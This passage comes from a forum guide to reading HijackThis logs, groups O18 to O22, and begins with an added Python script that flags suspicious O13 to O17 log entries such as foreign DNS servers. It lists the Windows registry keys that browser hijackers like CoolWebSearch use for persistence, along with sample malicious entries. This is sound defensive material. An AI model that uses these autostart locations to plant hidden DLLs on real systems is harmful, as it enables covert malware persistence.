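    The advice for the O13, O15, O16 and O17 groups above amounts to a few mechanical checks, so here they are as a script. This is an added example, not code from the original post or from HijackThis: it parses a constructed log excerpt built from the post's own sample lines and flags what the post says to flag. The allowlists (ISP_RESOLVERS, TRUSTED_ZONE_ALLOW, DPF_PUBLISHER_ALLOW) are assumptions standing in for your own reference data; the ISP range is the RFC 5737 documentation block, so both sample name servers come out as foreign.

```python
# Triage of O13/O15/O16/O17 entries from a HijackThis log (added example).
# The allowlists are assumptions standing in for your own reference data.
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed excerpt built from the samples quoted in the post.
SAMPLE_LOG_LINES = [
    r"O13 - WWW. Prefix: http://ehttp.cc/?",
    r"O15 - Trusted Zone: http://www.arwinianos.net",
    r"O16 - DPF: (iPIX ActiveX Control) - http://www.ipix.com/download/ipixx.cab",
    r"O17 - HKLM\System\CS1\Services\VxD\MSTCP:NameServer=69.57.146.14,69.57.147.175",
]

# Assumed reference data. ISP_RESOLVERS uses the RFC 5737 documentation range
# as a stand-in for the resolvers your ISP really hands out.
ISP_RESOLVERS = [ipaddress.ip_network("192.0.2.0/24")]
TRUSTED_ZONE_ALLOW = {"update.microsoft.com"}   # hosts you deliberately trusted
DPF_PUBLISHER_ALLOW = {"www.ipix.com"}          # ActiveX publishers you accept

LINE_RE = re.compile(r"^(O\d{1,2}) - (.*)$")
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)


def hostname(url):
    """Lower-cased host of a URL or bare host name."""
    if not SCHEME_RE.match(url):
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower()


def typed_url_after_prefix(typed, prefix):
    """What IE does with an address typed without a scheme: prepend the prefix."""
    return typed if SCHEME_RE.match(typed) else prefix + typed


def check_o13(rest):
    """Default prefix must be plain http://; anything else rewrites every typed URL."""
    prefix = rest.split(":", 1)[1].strip()
    detail = "default prefix %r; typing www.google.com opens %s" % (
        prefix, typed_url_after_prefix("www.google.com", prefix))
    return prefix.lower() != "http://", detail


def check_o15(rest):
    """Trusted-zone domain you did not add yourself."""
    host = hostname(rest.split(":", 1)[1].strip())
    return host not in TRUSTED_ZONE_ALLOW, "trusted-zone entry for " + host


def check_o16(rest):
    """ActiveX control downloaded from a publisher you do not recognise."""
    host = hostname(rest.rsplit(" - ", 1)[1].strip())
    return host not in DPF_PUBLISHER_ALLOW, "ActiveX cab downloaded from " + host


def check_o17(rest):
    """Name servers that are not your ISP's: the DNS hijack the post describes."""
    servers = rest.split("NameServer", 1)[1].lstrip(" =")
    foreign = []
    for token in re.split(r"[,\s]+", servers.strip()):
        ip = ipaddress.ip_address(token)
        if not any(ip in net for net in ISP_RESOLVERS):
            foreign.append(str(ip))
    if foreign:
        return True, "name servers outside ISP ranges: " + ", ".join(foreign)
    return False, "name servers all belong to the ISP"


CHECKS = {"O13": check_o13, "O15": check_o15, "O16": check_o16, "O17": check_o17}


def triage(lines):
    """Return one finding per recognised line: tag, suspicious flag, detail."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m.group(1) not in CHECKS:
            continue
        suspicious, detail = CHECKS[m.group(1)](m.group(2))
        findings.append({"tag": m.group(1), "suspicious": suspicious, "detail": detail})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG_LINES):
        print("%s %-8s %s" % (f["tag"], "SUSPECT" if f["suspicious"] else "ok", f["detail"]))
```

    A flagged entry is a prompt to investigate, exactly as the post says, not a verdict: the iPIX line comes out clean only because its publisher is on the assumed allowlist, and the O17 check can only tell you the resolvers are not your ISP's, so the Whois step above still applies.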
    ____________________________________________________________________________________________________ ____________________

    Group O18.
    This group is for extra protocols and protocol hijackers.

    This method is used to replace the standard protocol drivers that your computer uses with the hijacker's own. This allows the hijacker to take control of certain channels through which your computer sends and receives information.

    Registry keys:
    Code:
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter
    HijackThis first reads the PROTOCOLS registry key looking for non-standard protocols. When it finds one, it looks up the CLSID for more information and the file path.

    Sample listing O18:
    Code:
    O18 - Protocol: relatedlinks - - C:\PROGRA~1\COMMON~1\MSIETS\msielink.dll
    The most common hijackers that do this are CoolWebSearch, Related Links, and Lop.com. If you see these names you can fix them using HijackThis.
    Use Google to see if the files are legitimate. You can also use CastleCops' O18 list as a reference to verify the files.

    When you fix these entries with HijackThis, HijackThis will try to delete the listed file. Sometimes the file may be in use even if Internet Explorer is closed. If the file is still not removed, you must boot into safe mode and remove it manually.
    ____________________________________________________________________________________________________ ____________________

    Group O19.
    This group is for the user style sheet hijacker.

    A style sheet is a template for how the layers, colors and fonts of an HTML page are displayed. This type of hijack overrides the default style sheet, which was designed to help users, and causes large numbers of pop-ups (advertising pop-ups) or spam, resulting in annoyance or potential slowdowns.

    Registry key:
    Code:
    HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles\: User Stylesheets
    Sample listing O19:
    Code:
    O19 - User style sheet: c:\WINDOWS\Java\my.css
    In general, these entries can be fixed without major problems with HijackThis.

    When you fix these entries with HijackThis, HijackThis will try to delete the listed file. Sometimes the file may be in use even if Internet Explorer is closed. If the file is still not removed, you must boot into safe mode and remove it manually.
    ____________________________________________________________________________________________________ ____________________

    Group O20.
    This group is for files loaded via the AppInit_DLLs registry value.

    The AppInit_DLLs registry value contains a list of DLLs (libraries) to be loaded whenever user32.dll is loaded. Many Windows executables use the user32.dll library, which means that any DLL listed in the AppInit_DLLs value will be loaded into them as well. This makes it very difficult to remove, because the DLL is loaded into many processes, many of which cannot be stopped without causing system instability. user32.dll is also used by the processes that the system starts automatically when you log on. This means that the files listed in the AppInit_DLLs value are loaded very early in the Windows startup routine, allowing the DLL to hide or protect itself before we have access to the system.

    This method is known to be used by a variant of CoolWebSearch, and the value can only be seen in Regedit by right-clicking on it and selecting Modify Binary Data. Registrar Lite, on the other hand, shows this DLL more easily.

    Registry key:
    Code:
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows
    Sample listing O20:
    Code:
    O20 - AppInit_DLLs: C:\WINDOWS\System32\winifhi.dll
    Very few legitimate programs use this registry value, but you must still proceed with caution when deciding to delete the files listed here. Use Google or a startup list (the Bleeping Computer startup list) as a reference to investigate whether the files are legitimate.

    When you fix these entries with HijackThis, HijackThis will try to delete the listed file. Sometimes the file may be in use. If the file is still not removed, you must boot into safe mode and remove it manually.
    ____________________________________________________________________________________________________ ____________________

    Group O21.
    This group is for files loaded through the ShellServiceObjectDelayLoad registry key.

    This key contains values similar to those of the Run registry key. The difference is that instead of pointing directly to the file, it points to a CLSID, whose InProcServer32 entry holds the information about the particular DLL being used.

    Files under this key are loaded automatically by Explorer.exe when your computer starts. Because Explorer.exe is the shell of your computer, it is always loaded, and so are the files under this key. These files are therefore loaded early in the startup process, before any human intervention.

    A hijacker that uses this method can be recognized by the following entries:

    Code:
    R0 - HKCU\Software\Microsoft\Internet Explorer\Main, Start Page = C:\WINDOWS\secure.html
    R1 - HKCU\Software\Microsoft\Internet Explorer\Main, Default_Page_URL=C:\WINDOWS\secure.html
    Registry key:
    Code:
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
    Sample listing O21:
    Code:
    O21 - SSODL: System - - C:\WINDOWS\system32\system32.dll
    HijackThis has an internal database of recognized legitimate uses and leaves those out of the log, so any O21 entry you do see can be considered suspicious.
    You can check the DLL on Google or in this list:
    Bleeping Computer's list of O21 DLLs.

    When you fix these entries with HijackThis, HijackThis will try to delete the listed file. Sometimes the file may be in use. If the file is still not removed, you must boot into safe mode and remove it manually.
    ____________________________________________________________________________________________________ ____________________

    Group O22.
    This group is for files loaded through the SharedTaskScheduler registry value.
    Entries under this key run automatically when Windows starts. To date only CWS.Smartfinder is known to use this key.

    Registry key:
    Code:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler
    Sample listing O22:
    Code:
    O22 - SharedTaskScheduler: (no name) - - c:\windows\system32\mtwirl32.dll
    HijackThis deletes the value associated with this SharedTaskScheduler entry, but does not delete the CLSID it points to or the file that the CLSID's InprocServer32 points to. Therefore, as in the previous groups, we must boot into safe mode and delete it manually, using Unlocker or a similar program.

    Here ends the manual; I hope it suits everyone.

    Any suggestion is more than welcome!

  8. #8
    Join Date
    Dec 2008
    Location
    Colombo
    Posts
    121

    Re: How to read a HijackThis log?

    Is this hijack successful? I STILL can't read hijack reports. Another question: how can such a small file scan the machine? Please explain.
